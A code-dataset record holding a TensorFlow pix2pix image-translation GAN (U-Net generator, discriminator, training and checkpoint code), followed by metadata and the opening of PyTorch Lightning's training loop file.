            e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv'))
            # e8 is (1 x 1 x self.gf_dim*8)
            self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8),
                [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True)
            # dropout regularizes the three deepest decoder layers
            d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5)
            d1 = tf.concat([d1, e7], 3)
            # d1 is (2 x 2 x self.gf_dim*8*2)
            self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1),
                [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True)
            d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5)
            d2 = tf.concat([d2, e6], 3)
            # d2 is (4 x 4 x self.gf_dim*8*2)
            self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2),
                [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True)
            d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5)
            d3 = tf.concat([d3, e5], 3)
            # d3 is (8 x 8 x self.gf_dim*8*2)
            self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3),
                [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True)
            d4 = self.g_bn_d4(self.d4)
            d4 = tf.concat([d4, e4], 3)
            # d4 is (16 x 16 x self.gf_dim*8*2)
            self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4),
                [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True)
            d5 = self.g_bn_d5(self.d5)
            d5 = tf.concat([d5, e3], 3)
            # d5 is (32 x 32 x self.gf_dim*4*2)
            self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5),
                [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True)
            d6 = self.g_bn_d6(self.d6)
            d6 = tf.concat([d6, e2], 3)
            # d6 is (64 x 64 x self.gf_dim*2*2)
            self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6),
                [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True)
            d7 = self.g_bn_d7(self.d7)
            d7 = tf.concat([d7, e1], 3)
            # d7 is (128 x 128 x self.gf_dim*1*2)
            self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7),
                [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True)
            # d8 is (256 x 256 x output_c_dim)
            return tf.nn.tanh(self.d8)
def sampler(self, image, y=None):
    """Build the inference-time generator graph, reusing trained weights.

    Mirrors `generator` exactly (U-Net encoder/decoder with skip
    connections) but calls ``scope.reuse_variables()`` so no new
    variables are created; used to sample fake_B from real_A.

    Args:
        image: input batch tensor; sliced/concatenated on axis 3 below,
            so layout is NHWC.
        y: unused; kept for signature compatibility.

    Returns:
        tanh-activated tensor of shape (batch_size, s, s, output_c_dim).
    """
    with tf.variable_scope("generator") as scope:
        scope.reuse_variables()

        s = self.output_size
        # Spatial sizes after each stride-2 halving of the output size.
        s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)

        # --- encoder ---  (shape comments assume s == 256)
        # image is (256 x 256 x input_c_dim)
        e1 = conv2d(image, self.gf_dim, name='g_e1_conv')
        # e1 is (128 x 128 x self.gf_dim)
        e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv'))
        # e2 is (64 x 64 x self.gf_dim*2)
        e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv'))
        # e3 is (32 x 32 x self.gf_dim*4)
        e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv'))
        # e4 is (16 x 16 x self.gf_dim*8)
        e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv'))
        # e5 is (8 x 8 x self.gf_dim*8)
        e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv'))
        # e6 is (4 x 4 x self.gf_dim*8)
        e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv'))
        # e7 is (2 x 2 x self.gf_dim*8)
        e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv'))
        # e8 is (1 x 1 x self.gf_dim*8)

        # --- decoder with skip connections (concat on channel axis) ---
        # NOTE: dropout is applied unconditionally on d1-d3, so sampling
        # is stochastic here too (matches the pix2pix paper's design).
        self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8),
            [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True)
        d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5)
        d1 = tf.concat([d1, e7], 3)
        # d1 is (2 x 2 x self.gf_dim*8*2)

        self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1),
            [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True)
        d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5)
        d2 = tf.concat([d2, e6], 3)
        # d2 is (4 x 4 x self.gf_dim*8*2)

        self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2),
            [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True)
        d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5)
        d3 = tf.concat([d3, e5], 3)
        # d3 is (8 x 8 x self.gf_dim*8*2)

        self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3),
            [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True)
        d4 = self.g_bn_d4(self.d4)
        d4 = tf.concat([d4, e4], 3)
        # d4 is (16 x 16 x self.gf_dim*8*2)

        self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4),
            [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True)
        d5 = self.g_bn_d5(self.d5)
        d5 = tf.concat([d5, e3], 3)
        # d5 is (32 x 32 x self.gf_dim*4*2)

        self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5),
            [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True)
        d6 = self.g_bn_d6(self.d6)
        d6 = tf.concat([d6, e2], 3)
        # d6 is (64 x 64 x self.gf_dim*2*2)

        self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6),
            [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True)
        d7 = self.g_bn_d7(self.d7)
        d7 = tf.concat([d7, e1], 3)
        # d7 is (128 x 128 x self.gf_dim*1*2)

        self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7),
            [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True)
        # d8 is (256 x 256 x output_c_dim)

        return tf.nn.tanh(self.d8)
def save(self, checkpoint_dir, step):
    """Write a checkpoint of the current session variables.

    Checkpoints are stored under
    ``<checkpoint_dir>/<dataset>_<batch_size>_<output_size>/pix2pix.model-<step>``;
    the per-configuration subdirectory is created on first use.
    """
    model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
    target_dir = os.path.join(checkpoint_dir, model_dir)

    if not os.path.exists(target_dir):
        os.makedirs(target_dir)

    self.saver.save(self.sess,
                    os.path.join(target_dir, "pix2pix.model"),
                    global_step=step)
def load(self, checkpoint_dir):
    """Restore the newest checkpoint for this model configuration.

    Looks in ``<checkpoint_dir>/<dataset>_<batch_size>_<output_size>``.

    Returns:
        True if a checkpoint was found and restored, False otherwise.
    """
    print(" [*] Reading checkpoint...")

    model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
    search_dir = os.path.join(checkpoint_dir, model_dir)

    state = tf.train.get_checkpoint_state(search_dir)
    if not (state and state.model_checkpoint_path):
        return False

    latest = os.path.basename(state.model_checkpoint_path)
    self.saver.restore(self.sess, os.path.join(search_dir, latest))
    return True
def test(self, args):
    """Run the trained generator over the validation set and save outputs.

    Reads ``./datasets/<dataset_name>/val/*.jpg``, batches them, restores
    the latest checkpoint, and writes one PNG grid per batch to
    ``<args.test_dir>/test_<idx>.png``.
    """
    init_op = tf.global_variables_initializer()
    self.sess.run(init_op)

    sample_files = glob('./datasets/{}/val/*.jpg'.format(self.dataset_name))

    # Sort inputs numerically by filename stem.
    # NOTE(review): assumes every val filename is "<int>.jpg" and uses '/'
    # separators — int() raises on any other name; verify dataset layout.
    n = [int(i) for i in map(lambda x: x.split('/')[-1].split('.jpg')[0], sample_files)]
    sample_files = [x for (y, x) in sorted(zip(n, sample_files))]

    # Load all testing inputs into memory.
    print("Loading testing images ...")
    sample = [load_data(sample_file, is_test=True) for sample_file in sample_files]

    if (self.is_grayscale):
        # Add a trailing channel axis for grayscale data.
        sample_images = np.array(sample).astype(np.float32)[:, :, :, None]
    else:
        sample_images = np.array(sample).astype(np.float32)

    # Split into fixed-size batches; a trailing partial batch would be
    # ragged here — presumably the val-set size divides batch_size.
    sample_images = [sample_images[i:i+self.batch_size]
                     for i in xrange(0, len(sample_images), self.batch_size)]
    sample_images = np.array(sample_images)
    print(sample_images.shape)

    start_time = time.time()  # NOTE: recorded but never reported below
    if self.load(self.checkpoint_dir):
        print(" [*] Load SUCCESS")
    else:
        # Proceeds with freshly-initialized weights when loading fails.
        print(" [!] Load failed...")

    for i, sample_image in enumerate(sample_images):
        idx = i+1
        print("sampling image ", idx)
        samples = self.sess.run(
            self.fake_B_sample,
            feed_dict={self.real_data: sample_image}
        )
        save_images(samples, [self.batch_size, 1],
                    './{}/test_{:04d}.png'.format(args.test_dir, idx))
| 44.981481
| 136
| 0.572715
|
from __future__ import division
import os
import time
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
from ops import *
from utils import *
class pix2pix(object):
    """Conditional GAN for paired image-to-image translation (pix2pix).

    U-Net generator with skip connections plus a convolutional
    discriminator; the generator loss combines a GAN term with an
    L1 reconstruction term weighted by ``L1_lambda``.
    """

    def __init__(self, sess, image_size=256,
                 batch_size=1, sample_size=1, output_size=256,
                 gf_dim=64, df_dim=64, L1_lambda=100,
                 input_c_dim=3, output_c_dim=3, dataset_name='facades',
                 checkpoint_dir=None, sample_dir=None):
        """Store hyper-parameters, create batch-norm layers, build the graph.

        Args:
            sess: TensorFlow session used for all graph execution.
            image_size: spatial size of the (square) input images.
            batch_size: images per batch.
            sample_size: unused beyond storage here.
            output_size: spatial size of generated images.
            gf_dim: generator filter count in the first conv layer.
            df_dim: discriminator filter count in the first conv layer.
            L1_lambda: weight of the L1 term in the generator loss.
            input_c_dim: channels of input images (1 means grayscale).
            output_c_dim: channels of output images.
            dataset_name: folder name under ./datasets.
            checkpoint_dir: where checkpoints are read/written.
            sample_dir: unused here (samples go where callers specify).
        """
        self.sess = sess
        self.is_grayscale = (input_c_dim == 1)
        self.batch_size = batch_size
        self.image_size = image_size
        self.sample_size = sample_size
        self.output_size = output_size

        self.gf_dim = gf_dim
        self.df_dim = df_dim

        self.input_c_dim = input_c_dim
        self.output_c_dim = output_c_dim

        self.L1_lambda = L1_lambda

        # Discriminator batch-norm layers.
        self.d_bn1 = batch_norm(name='d_bn1')
        self.d_bn2 = batch_norm(name='d_bn2')
        self.d_bn3 = batch_norm(name='d_bn3')

        # Generator encoder batch-norm layers (e1 has none).
        self.g_bn_e2 = batch_norm(name='g_bn_e2')
        self.g_bn_e3 = batch_norm(name='g_bn_e3')
        self.g_bn_e4 = batch_norm(name='g_bn_e4')
        self.g_bn_e5 = batch_norm(name='g_bn_e5')
        self.g_bn_e6 = batch_norm(name='g_bn_e6')
        self.g_bn_e7 = batch_norm(name='g_bn_e7')
        self.g_bn_e8 = batch_norm(name='g_bn_e8')

        # Generator decoder batch-norm layers (d8 has none).
        self.g_bn_d1 = batch_norm(name='g_bn_d1')
        self.g_bn_d2 = batch_norm(name='g_bn_d2')
        self.g_bn_d3 = batch_norm(name='g_bn_d3')
        self.g_bn_d4 = batch_norm(name='g_bn_d4')
        self.g_bn_d5 = batch_norm(name='g_bn_d5')
        self.g_bn_d6 = batch_norm(name='g_bn_d6')
        self.g_bn_d7 = batch_norm(name='g_bn_d7')

        self.dataset_name = dataset_name
        self.checkpoint_dir = checkpoint_dir
        self.build_model()

    def build_model(self):
        """Create placeholders, generator/discriminator graphs and losses."""
        # Input carries A and B concatenated along the channel axis.
        self.real_data = tf.placeholder(tf.float32,
                                        [self.batch_size, self.image_size, self.image_size,
                                         self.input_c_dim + self.output_c_dim],
                                        name='real_A_and_B_images')

        # NOTE(review): the first input_c_dim channels feed real_B and the
        # remainder real_A — the naming looks swapped; confirm against the
        # data-loading convention before changing anything.
        self.real_B = self.real_data[:, :, :, :self.input_c_dim]
        self.real_A = self.real_data[:, :, :, self.input_c_dim:self.input_c_dim + self.output_c_dim]

        self.fake_B = self.generator(self.real_A)

        # Conditional discriminator sees the input A paired with B.
        self.real_AB = tf.concat([self.real_A, self.real_B], 3)
        self.fake_AB = tf.concat([self.real_A, self.fake_B], 3)
        self.D, self.D_logits = self.discriminator(self.real_AB, reuse=False)
        self.D_, self.D_logits_ = self.discriminator(self.fake_AB, reuse=True)

        # Weight-sharing sampler graph for inference.
        self.fake_B_sample = self.sampler(self.real_A)

        self.d_sum = tf.summary.histogram("d", self.D)
        self.d__sum = tf.summary.histogram("d_", self.D_)
        self.fake_B_sum = tf.summary.image("fake_B", self.fake_B)

        # Standard GAN losses plus weighted L1 reconstruction for G.
        self.d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits, labels=tf.ones_like(self.D)))
        self.d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.zeros_like(self.D_)))
        self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.ones_like(self.D_))) \
            + self.L1_lambda * tf.reduce_mean(tf.abs(self.real_B - self.fake_B))

        self.d_loss_real_sum = tf.summary.scalar("d_loss_real", self.d_loss_real)
        self.d_loss_fake_sum = tf.summary.scalar("d_loss_fake", self.d_loss_fake)

        self.d_loss = self.d_loss_real + self.d_loss_fake

        self.g_loss_sum = tf.summary.scalar("g_loss", self.g_loss)
        self.d_loss_sum = tf.summary.scalar("d_loss", self.d_loss)

        # Split trainable variables by name prefix for the two optimizers.
        t_vars = tf.trainable_variables()
        self.d_vars = [var for var in t_vars if 'd_' in var.name]
        self.g_vars = [var for var in t_vars if 'g_' in var.name]

        self.saver = tf.train.Saver()

    def load_random_samples(self):
        """Load a random validation batch as a float32 array."""
        data = np.random.choice(glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)), self.batch_size)
        sample = [load_data(sample_file) for sample_file in data]

        if (self.is_grayscale):
            # Add trailing channel axis for grayscale data.
            sample_images = np.array(sample).astype(np.float32)[:, :, :, None]
        else:
            sample_images = np.array(sample).astype(np.float32)
        return sample_images

    def sample_model(self, sample_dir, epoch, idx):
        """Generate one random validation batch and save it as a PNG grid."""
        sample_images = self.load_random_samples()
        samples, d_loss, g_loss = self.sess.run(
            [self.fake_B_sample, self.d_loss, self.g_loss],
            feed_dict={self.real_data: sample_images}
        )
        save_images(samples, [self.batch_size, 1],
                    './{}/train_{:02d}_{:04d}.png'.format(sample_dir, epoch, idx))
        print("[Sample] d_loss: {:.8f}, g_loss: {:.8f}".format(d_loss, g_loss))

    def train(self, args):
        """Train the GAN.

        Expects ``args`` to provide lr, beta1, epoch, train_size,
        sample_dir and checkpoint_dir. Alternates one D update with two
        G updates per batch.
        """
        d_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \
            .minimize(self.d_loss, var_list=self.d_vars)
        g_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \
            .minimize(self.g_loss, var_list=self.g_vars)

        init_op = tf.global_variables_initializer()
        self.sess.run(init_op)

        self.g_sum = tf.summary.merge([self.d__sum,
                                       self.fake_B_sum, self.d_loss_fake_sum, self.g_loss_sum])
        self.d_sum = tf.summary.merge([self.d_sum, self.d_loss_real_sum, self.d_loss_sum])
        self.writer = tf.summary.FileWriter("./logs", self.sess.graph)

        counter = 1
        start_time = time.time()

        if self.load(self.checkpoint_dir):
            print(" [*] Load SUCCESS")
        else:
            print(" [!] Load failed...")

        for epoch in xrange(args.epoch):
            data = glob('./datasets/{}/train/*.jpg'.format(self.dataset_name))
            batch_idxs = min(len(data), args.train_size) // self.batch_size

            for idx in xrange(0, batch_idxs):
                batch_files = data[idx*self.batch_size:(idx+1)*self.batch_size]
                batch = [load_data(batch_file) for batch_file in batch_files]
                if (self.is_grayscale):
                    batch_images = np.array(batch).astype(np.float32)[:, :, :, None]
                else:
                    batch_images = np.array(batch).astype(np.float32)

                # Update D network.
                _, summary_str = self.sess.run([d_optim, self.d_sum],
                                               feed_dict={ self.real_data: batch_images })
                self.writer.add_summary(summary_str, counter)

                # Update G network.
                _, summary_str = self.sess.run([g_optim, self.g_sum],
                                               feed_dict={ self.real_data: batch_images })
                self.writer.add_summary(summary_str, counter)

                # G is run a second time — presumably deliberate (keeps
                # d_loss from collapsing to zero); confirm before removing.
                _, summary_str = self.sess.run([g_optim, self.g_sum],
                                               feed_dict={ self.real_data: batch_images })
                self.writer.add_summary(summary_str, counter)

                errD_fake = self.d_loss_fake.eval({self.real_data: batch_images})
                errD_real = self.d_loss_real.eval({self.real_data: batch_images})
                errG = self.g_loss.eval({self.real_data: batch_images})

                counter += 1
                print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \
                    % (epoch, idx, batch_idxs,
                        time.time() - start_time, errD_fake+errD_real, errG))

                # Periodic sampling and checkpointing keyed on counter.
                if np.mod(counter, 100) == 1:
                    self.sample_model(args.sample_dir, epoch, idx)

                if np.mod(counter, 500) == 2:
                    self.save(args.checkpoint_dir, counter)

    def discriminator(self, image, y=None, reuse=False):
        """Four-conv discriminator ending in a single linear logit.

        Returns (sigmoid(logit), logit); set ``reuse`` when building the
        graph a second time (fake branch).
        """
        with tf.variable_scope("discriminator") as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse == False

            h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv'))
            h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv')))
            h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv')))
            # Stride-1 final conv keeps spatial resolution before the
            # fully-connected logit.
            h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, d_h=1, d_w=1, name='d_h3_conv')))
            h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h3_lin')

            return tf.nn.sigmoid(h4), h4

    def generator(self, image, y=None):
        """U-Net generator: 8 conv encoder levels, 8 deconv decoder levels
        with skip connections, tanh output.

        Dropout is applied unconditionally on the first three decoder
        levels, as in the pix2pix paper.
        """
        with tf.variable_scope("generator") as scope:
            s = self.output_size
            # Spatial sizes after each stride-2 halving.
            s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)

            # --- encoder ---
            e1 = conv2d(image, self.gf_dim, name='g_e1_conv')
            e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv'))
            e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv'))
            e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv'))
            e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv'))
            e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv'))
            e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv'))
            e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv'))

            # --- decoder: deconv, (dropout,) batch-norm, skip concat ---
            self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8),
                [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True)
            d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5)
            d1 = tf.concat([d1, e7], 3)

            self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1),
                [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True)
            d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5)
            d2 = tf.concat([d2, e6], 3)

            self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2),
                [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True)
            d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5)
            d3 = tf.concat([d3, e5], 3)

            self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3),
                [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True)
            d4 = self.g_bn_d4(self.d4)
            d4 = tf.concat([d4, e4], 3)

            self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4),
                [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True)
            d5 = self.g_bn_d5(self.d5)
            d5 = tf.concat([d5, e3], 3)

            self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5),
                [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True)
            d6 = self.g_bn_d6(self.d6)
            d6 = tf.concat([d6, e2], 3)

            self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6),
                [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True)
            d7 = self.g_bn_d7(self.d7)
            d7 = tf.concat([d7, e1], 3)

            # Final deconv back to output resolution, no batch-norm.
            self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7),
                [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True)

            return tf.nn.tanh(self.d8)

    def sampler(self, image, y=None):
        """Inference-time copy of `generator` with ``reuse_variables()``.

        Identical layer structure — kept in sync with `generator` by hand;
        any change there must be mirrored here.
        """
        with tf.variable_scope("generator") as scope:
            scope.reuse_variables()

            s = self.output_size
            s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)

            # --- encoder ---
            e1 = conv2d(image, self.gf_dim, name='g_e1_conv')
            e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv'))
            e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv'))
            e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv'))
            e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv'))
            e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv'))
            e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv'))
            e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv'))

            # --- decoder with skip connections ---
            self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8),
                [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True)
            d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5)
            d1 = tf.concat([d1, e7], 3)

            self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1),
                [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True)
            d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5)
            d2 = tf.concat([d2, e6], 3)

            self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2),
                [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True)
            d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5)
            d3 = tf.concat([d3, e5], 3)

            self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3),
                [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True)
            d4 = self.g_bn_d4(self.d4)
            d4 = tf.concat([d4, e4], 3)

            self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4),
                [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True)
            d5 = self.g_bn_d5(self.d5)
            d5 = tf.concat([d5, e3], 3)

            self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5),
                [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True)
            d6 = self.g_bn_d6(self.d6)
            d6 = tf.concat([d6, e2], 3)

            self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6),
                [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True)
            d7 = self.g_bn_d7(self.d7)
            d7 = tf.concat([d7, e1], 3)

            self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7),
                [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True)

            return tf.nn.tanh(self.d8)

    def save(self, checkpoint_dir, step):
        """Write a checkpoint under a per-configuration subdirectory."""
        model_name = "pix2pix.model"
        model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
        checkpoint_dir = os.path.join(checkpoint_dir, model_dir)

        if not os.path.exists(checkpoint_dir):
            os.makedirs(checkpoint_dir)

        self.saver.save(self.sess,
                        os.path.join(checkpoint_dir, model_name),
                        global_step=step)

    def load(self, checkpoint_dir):
        """Restore the latest checkpoint; return True on success."""
        print(" [*] Reading checkpoint...")

        model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
        checkpoint_dir = os.path.join(checkpoint_dir, model_dir)

        ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
        if ckpt and ckpt.model_checkpoint_path:
            ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
            self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
            return True
        else:
            return False

    def test(self, args):
        """Run the generator over the validation set, saving PNG grids."""
        init_op = tf.global_variables_initializer()
        self.sess.run(init_op)

        sample_files = glob('./datasets/{}/val/*.jpg'.format(self.dataset_name))

        # Sort by numeric filename stem.
        # NOTE(review): assumes "<int>.jpg" names with '/' separators.
        n = [int(i) for i in map(lambda x: x.split('/')[-1].split('.jpg')[0], sample_files)]
        sample_files = [x for (y, x) in sorted(zip(n, sample_files))]

        print("Loading testing images ...")
        sample = [load_data(sample_file, is_test=True) for sample_file in sample_files]

        if (self.is_grayscale):
            sample_images = np.array(sample).astype(np.float32)[:, :, :, None]
        else:
            sample_images = np.array(sample).astype(np.float32)

        # Chunk into batches of batch_size.
        sample_images = [sample_images[i:i+self.batch_size]
                         for i in xrange(0, len(sample_images), self.batch_size)]
        sample_images = np.array(sample_images)
        print(sample_images.shape)

        start_time = time.time()  # NOTE: recorded but never reported
        if self.load(self.checkpoint_dir):
            print(" [*] Load SUCCESS")
        else:
            print(" [!] Load failed...")

        for i, sample_image in enumerate(sample_images):
            idx = i+1
            print("sampling image ", idx)
            samples = self.sess.run(
                self.fake_B_sample,
                feed_dict={self.real_data: sample_image}
            )
            save_images(samples, [self.batch_size, 1],
                        './{}/test_{:04d}.png'.format(args.test_dir, idx))
| true
| true
|
f705d82868da78fc4b8e5a14a1c63f8b5d2c006e
| 39,980
|
py
|
Python
|
pytorch_lightning/trainer/training_loop.py
|
songwanguw/pytorch-lightning
|
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/trainer/training_loop.py
|
songwanguw/pytorch-lightning
|
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
|
[
"Apache-2.0"
] | 1
|
2020-11-11T11:36:38.000Z
|
2020-11-11T11:36:38.000Z
|
pytorch_lightning/trainer/training_loop.py
|
songwanguw/pytorch-lightning
|
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
from copy import copy, deepcopy
import numpy as np
import torch
import torch.distributed as torch_distrib
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning.core.memory import ModelSummary
from pytorch_lightning.core.step_result import EvalResult, Result
from pytorch_lightning.trainer.states import TrainerState
from pytorch_lightning.trainer.supporters import TensorRunningAccum, Accumulator
from pytorch_lightning.utilities import parsing, AMPType
from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.memory import recursive_detach
from pytorch_lightning.utilities.model_utils import is_overridden
from pytorch_lightning.utilities.parsing import AttributeDict
from pytorch_lightning.utilities.warning_utils import WarningCache
class TrainLoop:
def __init__(self, trainer):
    """Create per-run training-loop state attached to ``trainer``."""
    self.trainer = trainer
    # Smoothed window over recent training losses.
    self.running_loss = TensorRunningAccum(window_length=20)
    self.warning_cache = WarningCache()
    # Epoch-scoped accumulators, (re)created in on_train_epoch_start.
    self.early_stopping_accumulator = None
    self.checkpoint_accumulator = None
